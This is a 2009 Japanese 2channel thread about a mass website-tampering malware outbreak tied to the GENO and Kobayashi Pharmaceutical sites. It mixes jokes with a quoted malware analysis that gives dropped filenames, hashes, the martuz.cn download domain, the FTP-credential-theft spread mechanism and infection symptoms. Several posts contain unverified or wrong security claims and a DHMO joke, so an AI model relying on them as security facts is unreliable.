>>197 >>199 【セキュリティ】定義ファイル使わない国産ウイルス対策ソフト「yarai」、Winnyの脆弱性を発見した鵜飼裕司氏らが開発[09/05/14]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242318155/100 100 名前:名刺は切らしておりまして[sage] 投稿日:2009/05/17(日) 20:28:03 ID:ccyGmsXQ
このyaraiとやらも4つのヒューリスティックエンジンと言ってるけども、記事
やHPの内容を見る限りでは、一般的なスタティック・ヒューリスティック法
の部分はスタティク分析エンジンとかいう部分じゃないかな。
SandBoxエンジンは、ダイナミック・ヒューリスティック法ってやつだと思う。
たぶんノートンがこれに近いことをやってる気がする。
HIPSエンジンとやらはどう見てもビヘイビアだろう。
カスペルスキーのプロアクティブディフェンスがこれに相当するのでは。
ZDPエンジンてのは分類が判らない。今までこういうの自体あんま無かったし。
引用終わり
そもそも100%の対策ソフトなんて存在するわけ無いんだが、
ソースネクスト製品あたりの人は、買い換えた方が無難だろうね。
あと、adobe製品のアップデートやOSのアップデートも怠らないように。
一太郎とかもだっけ?
win
mac
linux
使ってるけど一番穴の多いのはmacだよ
誰も狙わないからいまんとこ大丈夫なだけで
電脳化してる人が閲覧するとマズイよ
ト-- 、
',:::::::::::::\ __ _,,.. -‐ァ
.〉::::::::::::::::`く´ `>''"´:::::::::::::|
|::::::::;>─- >- 、 '"´:::::::::::::::::::::::::|
|::/ `'<::::::::::::::::::::::::!
/ /_ ハ ヽ. \:::::::::::::::::ハ
,|. 7 |_/`| ト 、.__', Y  ̄\:::|
/| | ァ7ヽヘ. ! ´\_| |、:::::::::::\ 感染拡大
∠:::〉 |/` j_り \|ァ'Tこヽ、 ! \:::::::::::ハ
〈/ 7"" j___ン| ,ハ ∧__,r┘
<. ト 、 l7 =‐┐ ""/ |/ //レ'´ _◎ ___
` ーレヘ >、.,___.ノ_,,.イヘ>::''"´7/)-‐っ | ̄|┌┘ └┐ /ヽ |__ | [][]
/7ト::-<::::/ /::::::::::::::::|| ` く | /  ̄| | ̄ / /___. //
,|::/.`ー‐''". !::::::::::::::::::||--.rイ | |_ r‐┘└、/ ,-┐ |_〈 〈_
,..-/::7.: : ,トァ‐-- 、_||:::::_|/ ..|__|| () r、」__/ .|__| \__]
r- /::::::::::::;|\___// 〈  ̄  ̄ ̄
と||::::::::::::/ `>-‐< く \ | ̄|______
||::::::::::// \\ >、 |_____| /  ̄ ̄ ̄.|
`ーァヘ. >'"< ハ ┌────┐ / / ̄ ̄| |
rヘ \\ _,,... ‐'''",. '"` 、/ | └────| ̄|| ̄|| ̄| ̄ / /
\ \>--‐ ''"´ // | ̄ ̄ ̄ ̄  ̄  ̄ / / / /
`l<二二ニニ二ア‐ '´  ̄ ̄ ̄ ̄|_| ̄ ̄ / / /
`ーr-'、ノ|.| ./  ̄ ̄ / /
l__.ソ,ト- / PANDE MIC く /
/`‐' |
|_ソ
221 :
名無しさん@九周年:2009/05/17(日) 21:48:27 ID:GSOwuAeJO
常にage続けるスレ。
222 :
名無しさん@九周年:2009/05/17(日) 21:49:30 ID:buzMpw6xO
別に同人サイトだけで流行してる訳じゃない
ゲーム公式から出版社、ペットの名付け方サイトまでやられてる
判明してないだけだ
ちなみに一番ひどかったのは、栄えある命名権獲得の
PCショップGENO
223 :
名無しさん@九周年:2009/05/17(日) 21:49:46 ID:K8jkbOL00
外出すればトンフルに感染し
引きこもっていれば小林製薬のGENOようじに感染し
俺はもうどうしたら(´・ω・`)
>>217 いいまとめだ。
これのZDPエンジンてのが脆弱性対策用なんだよね。
225 :
名無しさん@九周年:2009/05/17(日) 21:52:47 ID:MEI0iJ4T0
こういうのってマイクロソフトに損害賠償請求できないの?
明らかにOSのアホ仕様が原因でそ。
226 :
名無しさん@九周年:2009/05/17(日) 21:52:48 ID:GSOwuAeJO
同人サイトだけじゃないのか?
仕事でネットで調べものしても感染するのか?
そりゃヤバすぎるぞ。
スレタイに
「パンデミック??」
とか、人目を引く言葉を入れてほしかったなぁ。
ageage
>>213 そのためにはまず濃密な肉体的接触を
>>216 Macがウィルスに強いというのは嘘だし
UNIX系OSだからウィルスに感染しないというのも嘘だ
Macはシェアが低いので狙われにくいだけで、OS Xそのものは非常に脆弱だ
Linuxでも同様にシェアが低いせいで攻撃を受けないで済んでいるという面はある
が少なくともLinuxはVistaと同等かそれ以上の保護機構は備えている
またyum/aptによるアップデートや管理の容易さはLinuxの大きな利点だ
だから私はLinuxがもっとも安全な選択肢だと信じる
愚か者はまとめてNGIDにした
こういうセキュリティ関連のスレで嘘を言って宣伝しようとするのは
実に卑怯なやりくちだ
私はこういう輩を軽蔑する
>>222 キャッシュ削除すれば問題ないなんて大嘘ついた罪は重い
martuz.cnから?pdf落とそうとするのがそーなの?
そういえば、明日「先週末何してた?」って訊かれた時に
「2chに張り付いてた」とか答えたくないんだけど、なんか気の利いた回答を教えてよ。
231 :
名無しさん@九周年:2009/05/17(日) 21:55:10 ID:81OiHRBU0
>>227 もうその手の詭弁が通用しなくなってることに気づけやw
>>220 マッテタ!
>>230 「Steamの週末セールでCoD WaWが半額だったので買ったけどもう飽きた」
233 :
名無しさん@九周年:2009/05/17(日) 21:56:21 ID:x8B+YKoI0
ウイルス対策の情報収集してた・・・で。。。
>>230
なんでこんなに関心がないんだ?
知らん間に自分のサイトが発信源になってるかもしれんというのに
今回はavast!入れてて良かったと思う騒動だったな
小林製薬のサイトは行ってないけど
237 :
名無しさん@九周年:2009/05/17(日) 22:03:23 ID:GSOwuAeJO
このスレタイじゃわかんないよ。
age
___
/ \
_____ / \
/ || ̄ ̄ ̄ ̄|| / \ どうしてこうなった・・・
|.....||GENO... ..|| | |
|.....|| || \ /
|.....||____|| ___/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄/
| ̄ ̄ ̄ ̄\三(_ / /
| | / /
___
/ \
_____ ミ. / ⌒ ⌒ \
/ || ̄ ̄ ̄ ̄|| / =⊂⊃=⊂⊃=\ どうしてこうなった!?
|.....||GENO... ..|| | (__人__) |
|.....|| || ミ \ `ー'´ /
|.....||____|| ___/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄/
| ̄ ̄ ̄ ̄\三(_ / /
| | / /
♪ ___
/⌒ ⌒\
/=⊂⊃=⊂⊃=\ ,⌒ヽ
_____ _/ (__人__) \ゝ ノ どうしてこうなった!
/ || ̄ ̄ ̄ ̄|| ( | |r┬-| | | どうしてこうなった!
|.....||GENO. ...|| | \ `ー'´ / _ノ
|.....|| || └‐、 レ´`ヽ
|.....||____|| `/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄/ \ ♪
| ̄ ̄ ̄ ̄\三. / /ノ`ヽ,,__ノ
| | / /
239 :
名無しさん@九周年:2009/05/17(日) 22:07:26 ID:GSOwuAeJO
あげ続ける。
こんなに書き続けたら、そのうちピロシキから
2ちゃん使用料の請求書がくるかなぁ。
240 :
名無しさん@九周年:2009/05/17(日) 22:09:33 ID:hDs5a3Mb0
企業用のウイルスバスターはこれに有効なの?
この会社、みんなの就職活動日記でボコボコにされてた会社だw
めしうまwwww
242 :
名無しさん@九周年:2009/05/17(日) 22:10:47 ID:Dl9D7Ns6O
マスクしてなかったの?>小林製薬
243 :
名無しさん@九周年:2009/05/17(日) 22:11:32 ID:GSOwuAeJO
なんかウィルスの変異だか何だかが早くて
ウィルス駆除ソフトが追い付けないとか何とか。
244 :
名無しさん@九周年:2009/05/17(日) 22:11:59 ID:PyzgRQgk0
このスレタイじゃ誰も見ない。
本来なら勢いTOPになってて良いんだが・・・
245 :
名無しさん@九周年:2009/05/17(日) 22:12:08 ID:PyhibbPO0
GENOさんパネエっす
246 :
名無しさん@九周年:2009/05/17(日) 22:12:54 ID:xMXoigIfO
GENOてなーに
247 :
名無しさん@九周年:2009/05/17(日) 22:13:10 ID:ONbLLSKl0
ググっただけでもヤバいと聞いて飛んできますた
248 :
名無しさん@九周年:2009/05/17(日) 22:13:22 ID:gnuxpBe70
この前のSay Move!と同じ奴か?
249 :
名無しさん@九周年:2009/05/17(日) 22:14:17 ID:HH6PqBvv0
まぁスレタイ見るだけだったら小林なんていってないしおkってなるわな
価格.comの時もそうだったし
サイト持ちから更に二次感染するってのが怖いのに
250 :
名無しさん@九周年:2009/05/17(日) 22:15:00 ID:zRSYJwG2O
小林製薬と言えばこれはもう、
「糸ようじ」
で決まりでしょう。
251 :
名無しさん@九周年:2009/05/17(日) 22:15:07 ID:GSOwuAeJO
めっちゃエライこってす。
自分のPCの予防も大変だけど、
それより何より、
明日、職場のみんなに何て言って
忠告しようかと。
「2チャンネルで見たんだけど…!」
orz
252 :
名無しさん@九周年:2009/05/17(日) 22:16:16 ID:Gz7wcEUtO
>>1 なんでこんなスレタイにしたのか。
これじゃまるきり小林製薬だけの問題みたいじゃん
253 :
名無しさん@九周年:2009/05/17(日) 22:16:48 ID:WatdXLrgO
新商品「菌撃退」
254 :
名無しさん@九周年:2009/05/17(日) 22:17:10 ID:/BuRBwBP0
怖いなあ、2ちゃんも改竄されたりして
IE以外で閲覧しても危険なのかね
256 :
名無しさん@九周年:2009/05/17(日) 22:17:25 ID:x1i6opsm0
サイト見ただけでシステム書き換えられるとか、一体どうやったら
そんなこと出来るようになるんだよw >Windows(笑)
>>240 ビジネスセキュリティなら、対応している可能性もあるが、
コーポレートエディションは、オプションをつけていないと弱いカモね。
あくまで「可能性」ですが
ウィルス対策ソフトだけでは対応しきれん。
258 :
名無しさん@九周年:2009/05/17(日) 22:20:06 ID:ONbLLSKl0
自分で対策できない会社のPCが不安だ・・・
HDDの電源を抜いてPuppy Linuxを使えばいいのですか?
260 :
名無しさん@九周年:2009/05/17(日) 22:20:25 ID:t5C/3fzq0
vistaは大丈夫なんですか?
261 :
名無しさん@九周年:2009/05/17(日) 22:20:30 ID:09s1Pk4l0
小林製薬のサイトなんて生まれてこのかた閲覧したことないから
改ざんでも何でも勝手にしといてくれ
小林製薬の
「ウイルスうつーる」
GENOの文字をタイトルに入れておいてくれー
関連スレ無いのかと思ったじゃないか
264 :
名無しさん@九周年:2009/05/17(日) 22:22:20 ID:GSOwuAeJO
GoogleかYahoo!でニュースとしてあげといてくれれば、
同僚や上司に
「ニュースで見たんですが…!」
と言えるんだが…
265 :
名無しさん@九周年:2009/05/17(日) 22:22:29 ID:hDs5a3Mb0
>>257 そうですか、ありがとうございます。
アクロバツトを最新に更新します。
>>256 アプリの脆弱性があれば
Linuxでも可能
267 :
名無しさん@九周年:2009/05/17(日) 22:23:06 ID:JsSjXo320
GENOはしょっちゅうウィルス蒔いてるな
何度目だコレ
268 :
名無しさん@九周年:2009/05/17(日) 22:23:08 ID:kILeLY9IO
製薬会社がウイルス感染とは皮肉な話だが
まあ別にコンピューター用の予防薬やワクチンを作っているわけでもあるまいし
それはそれで仕方ない
まあセキュリティーソフト会社がコンピューターウイルスに感染したら
それこそ最悪のイメージダウンになってしまうが
そういえば実際にそんな事件もあったな
>>260 UACが防いでくれる
心配する暇があったらAdobe ReaderとFlash Playerをアップデートしろよ
個人情報保護みたいなクレーマー歓喜!
のルールが無ければなあ
感染・媒介しないのがベストだが
万が一ウイルス感染してもまあ楽勝なのになあ
271 :
名無しさん@九周年:2009/05/17(日) 22:23:48 ID:7ljK8XR20
>>257 その前にNWセキュリティとかの
パターンファイルでブロックされてる罠
191 名前:名無しさん@九周年[sage] 投稿日:2009/05/17(日) 21:16:43 ID:Kfvmxa+T0
ここにもキチガイどもが集まりつつあるようだ
198 名前:名無しさん@九周年[sage] 投稿日:2009/05/17(日) 21:22:24 ID:Kfvmxa+T0
可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい
どっちがキチガイかw
273 :
名無しさん@九周年:2009/05/17(日) 22:23:50 ID:ONbLLSKl0
>>264 俺と同じ悩みだww
2ちゃんソースの悲しさ
また小林かよ
>>268 >セキュリティーソフト会社がコンピューターウイルスに感染
昔どっか外国の話で聞いたような記憶が・・・
動画サイトをみたいので
java-scriptは常時OFFにできないしフラッシュプレイヤーも削除できない
GENOウィルス怖い
278 :
名無しさん@九周年:2009/05/17(日) 22:25:14 ID:GSOwuAeJO
・ウィルスの通称
・現在爆発感染中
・ウィルス対策ソフトでは駆除しきれない
・感染したらPC初期化しか手はない
この情報のどれか一つくらいは
スレタイに入れてほしかったな。
ウイルスに感染したら薬を飲めというメッセージを自ら示したんだろ?
さっき知って慌てて自分のサイト確認したぜ・・・
感染してないようでよかったが…
>>266 相手しないほうがいいよ
話が通じる奴じゃなさそうだ
ID変えて同じ事を九官鳥のように繰り返しレスしてる
案外こいつがウィルスの作者だったりして
>>272 腐女子に欲情したからってキチガイ扱いヒドス
282 :
名無しさん@九周年:2009/05/17(日) 22:26:38 ID:LZAEP/n90
>>266 システムはroot権限でしか書き換えらないのに、どうして一般権限
で動いてるアプリから書き換えられるんだ?w
ウィルス対策ソフトのウィルス○スターをインストールして、起動不能になることはあったね。
それとウィルスバ○ターの開発元が、ウィルスに感染したこともあったね。
285 :
名無しさん@九周年:2009/05/17(日) 22:29:00 ID:x57JKY380
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
286 :
名無しさん@九周年:2009/05/17(日) 22:29:04 ID:0KcFOizx0
PCのウィルスが何だ!
自分の体が在ってこそのPCだろ!
【WH○】”水酸の危険性”より
・水酸 (DHMO)とは
・水酸と呼ばれ、酸性雨に含まれる成分の1つである
・温室効果により各種異常気象を引き起こす
・原子炉内で存在が確認されている
・東海村臨界事故の原因の1つである
・重篤なやけどの原因となりうる
・末期がん患者の悪性腫瘍から検出される
・その危険性に反して、DHMOは頻繁に用いられている
・工業用の溶媒、冷却材として用いられる
・多くの材料の腐食を進行させる
・各種の動物実験に用いられる
・現在も防虫剤の散布に用いられており土壌入換え後も
DHMOは残留し産物に悪影響を与える
・欧州では6000人の死者が出ている
・戦後の日本の広島市内だけで1,100人前後が死亡している
287 :
名無しさん@九周年:2009/05/17(日) 22:29:04 ID:t5C/3fzq0
>>269 ありがとうございます!
Adobeとフラッシュはもうアップデートしました
288 :
名無しさん@九周年:2009/05/17(日) 22:29:08 ID:To/NbSUwO
ニフティセキュリティで確認・・・アウトでした。
駆除、削除してもすぐに復活。
バックアップして、しばらくネット謹慎です。
皆さんも、ニフティセキュリティで確認してみ
砂箱か仮想からなら安全?
サイトを見ていなければ大丈夫じゃないのか。
カスペルスキーの最新版常駐させて、スキャンして大丈夫だったら、心配無い?
>>281 こういうセキュリティ関連のスレで本音を言って欲情しようとするのは
実に卑猥なやりくちだ
私はこういう輩を軽蔑する
292 :
名無しさん@九周年:2009/05/17(日) 22:31:49 ID:To/NbSUwO
だからニフセキュリティで確認しろってwww
>>283 なんのことか分からんかったからググっちゃったじゃないかw
とりあえず同人板のスレでGENOウイルス云々言ってたからまとめ見て確認した
サイトの頭にでっかく注意喚起も書いといたよ
294 :
名無しさん@九周年:2009/05/17(日) 22:32:10 ID:5RuLx0eD0
再起動してみてブルー画面でたらアウト
VISTAは条件によるがほぼ無傷
295 :
名無しさん@九周年:2009/05/17(日) 22:32:11 ID:spcZi1BU0
これまでのあらすじ
04/04(土)
PC一般板のGENOスレで「GENOのサイトが改竄されている」との報告が出る。(10:43)
スレでの報告から、GENOサイトにアクセスするとウィルスに感染する可能性があることが明らかになる。
ν速にスレが立つ。(20:26)
改竄されたまま一日を終える。
04/05(日)
この日の夜から短縮URLによる各板へのウィルス爆撃が本格化。多数の犠牲者が出る。
GENOの店舗に赴いた有志が店員にこの一件を尋ねる。「Webのことは店舗ではわかりません」
セキュリティ板で通販サイト juicyrock.co.jp もGENOと同様の改竄を受けていることが報告される。
楽天のショップ www.rakuten.ne.jp/gold/i-na/ でGENOウィルスを検出したという話題が出る。
GENOサイトは完全放置のまま1日が終わる。
04/06(月)
社員がようやく出社してきたのか、サイトがメンテナンス中になる。(10:00頃)
※ただし「メンテナンス中」に切り替えたのはトップを含む数ページのみで、
未だ改竄された商品ページなどにアクセス可能だった。
価格.comなど価格比較サイトからGENOへのリンクが消える。
GENOウィルス事件をガジェット通信が報じる。livedoor、exciteに配信される。(12:32)
juicyrock.co.jp が403になる。その後復旧、「お詫び」が発表される。
www.rakuten.ne.jp/gold/i-na/ のページが真っ白に。その後何事もなく再開。
GENOが再開。「サーバーに一部不具合がございました」(20:20頃)
再開したものの、未だ改竄されたままであることが報告される。その後しばらくして正常に。
04/07(火)
GENO、再度改竄される。(8:00頃)
以下は、
http://www29.atwiki.jp/geno/pages/21.html でお読みくださいw
296 :
名無しさん@九周年:2009/05/17(日) 22:32:37 ID:GSOwuAeJO
GoogleかYahoo!でニュースにあげてくれーー
ageage
他の板見たら怪しいアドレスてんこ盛りでワラタw
298 :
名無しさん@九周年:2009/05/17(日) 22:33:23 ID:buzMpw6xO
お前らー
東方
ボカロ
大手サイト感染済みだからなー
踏んだニコ厨はPCクリーンインスコしとけよー
>>282 システムじゃなくても自身のhomeディレクトリなら書き換えられるという言い回しですか?
>>295 ちょw
事実だしGENOの態度はムカツクけど
今回の蔓延の件とGENOHP感染が直接関係あるかわからないのに
なんて偏った情報www
「小林製薬のサイトは見てないから大丈夫」とか言う奴は情弱。
既に国内だけで100以上のサイトに感染が広がっている。
明日になればその十倍〜数百倍以上になる見込み。
ここのサーバーは何で感染した訳?
microsoftのサーバーOSだったの?
305 :
名無しさん@九周年:2009/05/17(日) 22:38:03 ID:yigvtAXW0
いまどきWindowsでネットとかどんだけ情弱なんだよw
わけわかんないことで時間と金いくら無駄にしてるか考えてみろよw
306 :
名無しさん@九周年:2009/05/17(日) 22:39:04 ID:GSOwuAeJO
あげ続ける
307 :
名無しさん@九周年:2009/05/17(日) 22:39:49 ID:agKyD87CP
>>301 GENOが蔓延を助けたのは事実。
なんら偏ってない。
「キャッシュ削除しとけば大丈夫」みたいな説明しかしなかったために、
それを鵜呑みにした利用者が自分のHPを感染させ、さらに蔓延させてる。
309 :
名無しさん@九周年:2009/05/17(日) 22:41:37 ID:PzigguW70
>>304 今回サーバーは関係ない。
コンテンツの更新用PCがウイルス感染して汚染されたソースをサーバーにアップした。
できるだけネサフしないようにしないとな
311 :
名無しさん@九周年:2009/05/17(日) 22:42:27 ID:K8jkbOL00
>>304 >>307 ん〜と、
1. 感染しているサイトを開いたPCが感染。
2. そのPCで自分のサイトをいじる(ファイルのアップロード等)。
3. その結果自分のサイトも感染。
4. そのサイトを見た人にも感染が広がっている。
……ってことでOK?
ついでにage
313 :
名無しさん@九周年:2009/05/17(日) 22:42:38 ID:7ljK8XR20
GENOってさぁ・・・自鯖で自ドメイン?
もし仮に拡散の元凶であったら
賠償とかあるのかな?
mac2台とwin2台所有してるがネットはもう携帯電話でしかしてない
315 :
名無しさん@九周年:2009/05/17(日) 22:44:40 ID:r3xcW/UI0
>>311 thx!
おいらもage
今まとめwikiすごく重いね
断崖の頂上に浮かぶマリア像は
小林製薬の糸ようじ
閲覧ウイルスに新型ウイルスに、どんだけニュー速+にウイルススレあるんだよ
318 :
名無しさん@九周年:2009/05/17(日) 22:47:11 ID:GSOwuAeJO
早く★2になあれ。
もっと目立つスレタイになりますように。
319 :
名無しさん@九周年:2009/05/17(日) 22:47:27 ID:m5beBtZT0
マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・
まだまだ広がるのかな?
とりあえず慌てないのが一番なのかな?
>>39 化粧品会社のサイトは有無を言わさず
クソ思いFlashが作動する
馬鹿女は気にしないんだろうけど
映画配給関連だと、いきなり映画の予告再生とかさ
いきなり爆音がして何かと思うわ
二度と見たくないわな
323 :
名無しさん@九周年:2009/05/17(日) 22:50:47 ID:Gz7wcEUtO
マック・ビスタ・マイクロソフト最新連合大勝利!
XP涙目w
325 :
名無しさん@九周年:2009/05/17(日) 22:53:48 ID:kQXvOls5O
糸ようじ!
327 :
名無しさん@九周年:2009/05/17(日) 22:55:21 ID:5PY6KFWv0
2000,XP,(VISTA?)でなければおけ?
会社のはXPだわん
328 :
名無しさん@九周年:2009/05/17(日) 22:56:51 ID:19r9ZuwXO
サイトの改ざん被害が糸ようじ
小林製薬の糸ようじ
ウィルスバスター入れてますが、防げますか?
軽くて好きなんでAdobe5.0使ってるんだが
危険なら最新にした方がいいとは思うけど
むしろ5.0ぐらいだと既に古くて相手にさえされてない気も
そして最新にすると今度
むしろ最新版の脆弱性を狙われるような気がするし
どう思う?
自分の好き嫌いだけでは判断しかねてるので
ぜひ意見を聞いてみたいんだが
331 :
名無しさん@九周年:2009/05/17(日) 22:57:55 ID:dg3Mksro0
はじめてvistaで良かったと思った
332 :
名無しさん@九周年:2009/05/17(日) 22:58:57 ID:Gz7wcEUtO
ここで聞くよりセキュ板いけ
GENOが蔓延させてからもうずっとヤバイ状態なのに今頃+にスレ立った所でに手遅れ
333 :
名無しさん@九周年:2009/05/17(日) 23:00:20 ID:buzMpw6xO
まだまだ広がるんじゃなくて
もうとっくにヤバいレベルで広がってます
クレカパス抜かれたりするからきをつけろよ
因みにノートン先生他セキュリティーソフト全スルーだからな
334 :
名無しさん@九周年:2009/05/17(日) 23:00:58 ID:ONbLLSKl0
ここはどっちかというと周知役かな?
”安易にリンク踏むとやべぇ!”って事実だけでも・・・
VistaはNT3.51の遺志を継いだOSだからな
7では多少堅牢生は落ちるだろうが
336 :
名無しさん@九周年:2009/05/17(日) 23:01:45 ID:3PVmaavh0
企業サイトもあちこちやられて、今現在まだ某出版社は感染したまま。
けっこうな騒ぎになってたのに何日も経たないとスレ立てなかったここの記者もどうかと。
まったく危機感足りないよなw
>>311 ちょっと違う
>>55見れ
小林製薬の中のPCがウィルス感染してパス盗まれ
そのパスでサーバにFTPでウィルスアップロードされた
他の感染サーバも同じかどうかは知らない
>>324 JScriptもまとめてJSに出来るから女子小学生でも安心だな
>>331 vistaだからって抜かるなよ?
感染した奴が知るやら云々、亜種で感染するかもしんないし
ぷりんてぃん感染?ワロスwwwwwwwwwwwwwwww
339 :
名無しさん@九周年:2009/05/17(日) 23:03:41 ID:dhcilxrp0
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
340 :
名無しさん@九周年:2009/05/17(日) 23:03:42 ID:spcZi1BU0
>>336 その 某出版社 ってのちゃんとここで名前出してあげないと
知らないで見に行って感染する人出てくるよ
リンク入れる必要は無いけど、感染確認情報はハッキリとおねがい
>>340 成美堂出版だっけ、まだ対応して無いのか
ぷりんてぃんナツカシス
ググったらWikipediaに解説ページまであるし
343 :
名無しさん@九周年:2009/05/17(日) 23:04:56 ID:Gz7wcEUtO
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
ギョワー
あんまり盛り上がってないのん
芸スポ板いったら松本人志結婚だってね
345 :
名無しさん@九周年:2009/05/17(日) 23:07:01 ID:HH6PqBvv0
解析進んだみたいだけどどうにかなるのかこれ
糸 小 改 ウ
よ 林 ざ ェ
う 製 ん ブ
じ 薬 被 サ
の 害 イ
に ト
の
てか小林製薬は外部からのFTP空いてたのね?
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
MD5 : 3862b349b9b5c9283925e181ff9f5bf8
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
MD5 : 34cd61d83853e511f0a28027f639a1c9
http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)
muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
>>348 自鯖じゃなくてレン鯖かホスティング
IP制限もしてなかったんだろうねこの書き方じゃ
制限してても内部のPCがbot感染したらそこを串にされる可能性あるけど
FTPじゃなくてSSHだったとしても秘密鍵盗まれたら同じだし
351 :
名無しさん@九周年:2009/05/17(日) 23:13:31 ID:Gz7wcEUtO
ぷりんてぃんもXPだったのかな
352 :
名無しさん@九周年:2009/05/17(日) 23:13:58 ID:f+QWz3QW0
何か結局一日中、セキュ板同人板その他色々な板に張り付いてROMってて一日が終わったw
353 :
名無しさん@九周年:2009/05/17(日) 23:14:06 ID:cwXPGcJB0
今頃知ったわ。
こんなことニュースでやってたっけ?
セキュリティのこと何も知らずにネットやってるからこわいな…。
親はウィルスの存在さえ知らずにネットしてるし…。
354 :
名無しさん@九周年:2009/05/17(日) 23:14:46 ID:dg3Mksro0
>>349 こええええええええ
このウイルス本気でタチ悪いな
頼むからもっとスレ伸びて目立ってくれ
>>351 チェックしに行ってくれよ俺怖い
2ch感染とかいったら大変なことだなw
ごめん冗談にならんね
356 :
名無しさん@九周年:2009/05/17(日) 23:15:33 ID:spcZi1BU0
6 名前:GENOウイルス@お腹いっぱい :09/05/17 18:21:58 ID:di7dr/Jr
2月に私のPCが感染
特殊清掃系のサイトから感染
GENOで言われてる症状とまったく同一でした
最終的にはリカバリしか手の内ようがないと判断しリカバリ済み
この時ノートンでは感知しなかった、ノートンがあるから安心してたのに
先週は友人が感染したといってました
友人は同人系のサイトから感染、同じくノートン入れてたが
感知せず。Cドライブのみリカバリとのこと
感染時のPCの様子
レジストリ、コマンドは立ち上がらず
セキュリティサイト及びスパイウェア系サイト繋がらずエラーになる
フリーズして勝手に電源が切れてしまう
起動時に頻繁に青い画面が出てくる
特殊清掃系とはどこぞやw
まぁ、閲覧者は少なそうだけど
357 :
名無しさん@九周年:2009/05/17(日) 23:16:47 ID:f+QWz3QW0
>>354 「GENO」で検索してたから+に立ってるの気付かなかったくらいだからな・・・
平たく言うと一般に出回ってる駆除ソフトは基本的にパターンマッチで削除する
だけどこのGENOウイルスはそれをごく短い周期で変えてるから
今のとこどうやって対応すればいいのか分からん状態
変化に規則性があればいいんだが
359 :
名無しさん@九周年:2009/05/17(日) 23:17:55 ID:B/k6bY6T0
うはwwwwwwwwwwwwwwww空気感染したwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
360 :
名無しさん@九周年:2009/05/17(日) 23:18:06 ID:dg3Mksro0
親に注意しろって言ったら
「そのくらい自分で調べられる、馬鹿にするな」ってキレられたwww
ついこの前「拡張子って何?」って聞いてきた情弱のくせにwwwwwwwwwww
カンだけど特殊清掃系は死体画像サイトの事じゃね?
今日の糸ようじスレはここですか?
363 :
名無しさん@九周年:2009/05/17(日) 23:18:44 ID:8HqP18sh0
>>282 それをいうならWindowsも同じ理屈なんだがw
365 :
名無しさん@九周年:2009/05/17(日) 23:20:06 ID:spcZi1BU0
>>361 ・・・まったく、腐女子のすることは・・・w
366 :
名無しさん@九周年:2009/05/17(日) 23:20:49 ID:GSOwuAeJO
他の賑やかなスレに、このスレを告知して回ってるよ。
マジやばい。
367 :
名無しさん@九周年:2009/05/17(日) 23:21:09 ID:dhcilxrp0
>>360 まあWindowsでネットやってる時点で情弱だわな・・・
>>1 ハルヒが描いたSOS団のロゴ、それを貼り付けたHPを見ると・・・
369 :
名無しさん@九周年:2009/05/17(日) 23:21:58 ID:cwXPGcJB0
世間は新型インフルエンザでネットの世界はGENOウィルス…
後者の方がこわいな、自分には
370 :
名無しさん@九周年:2009/05/17(日) 23:21:58 ID:nYDmij9+0
通りすがりのWinMEだお
371 :
名無しさん@九周年:2009/05/17(日) 23:22:14 ID:V/Dj5MjT0
現実では豚インフルエンザ
仮想ではGENO
忙しい
372 :
名無しさん@九周年:2009/05/17(日) 23:22:49 ID:HH6PqBvv0
まとめサイトの転載ね
主な症状
* sqlsodbc.chmを改変
* cmd.exe、regedit.exeが起動不能
* 一部のアンチウイルスソフトが更新不能
* 特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
* ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
* Googleの検索結果を改竄(リンクを弄る)
* explorer.exeや一部のブラウザが異常終了
* Acrobatが勝手に起動
* PDFファイルやシステムファイルが増殖
* CPU、メモリ使用率がUP
* 再起動時にBSOD(=Blue Screen Of Death、青いエラー画面)
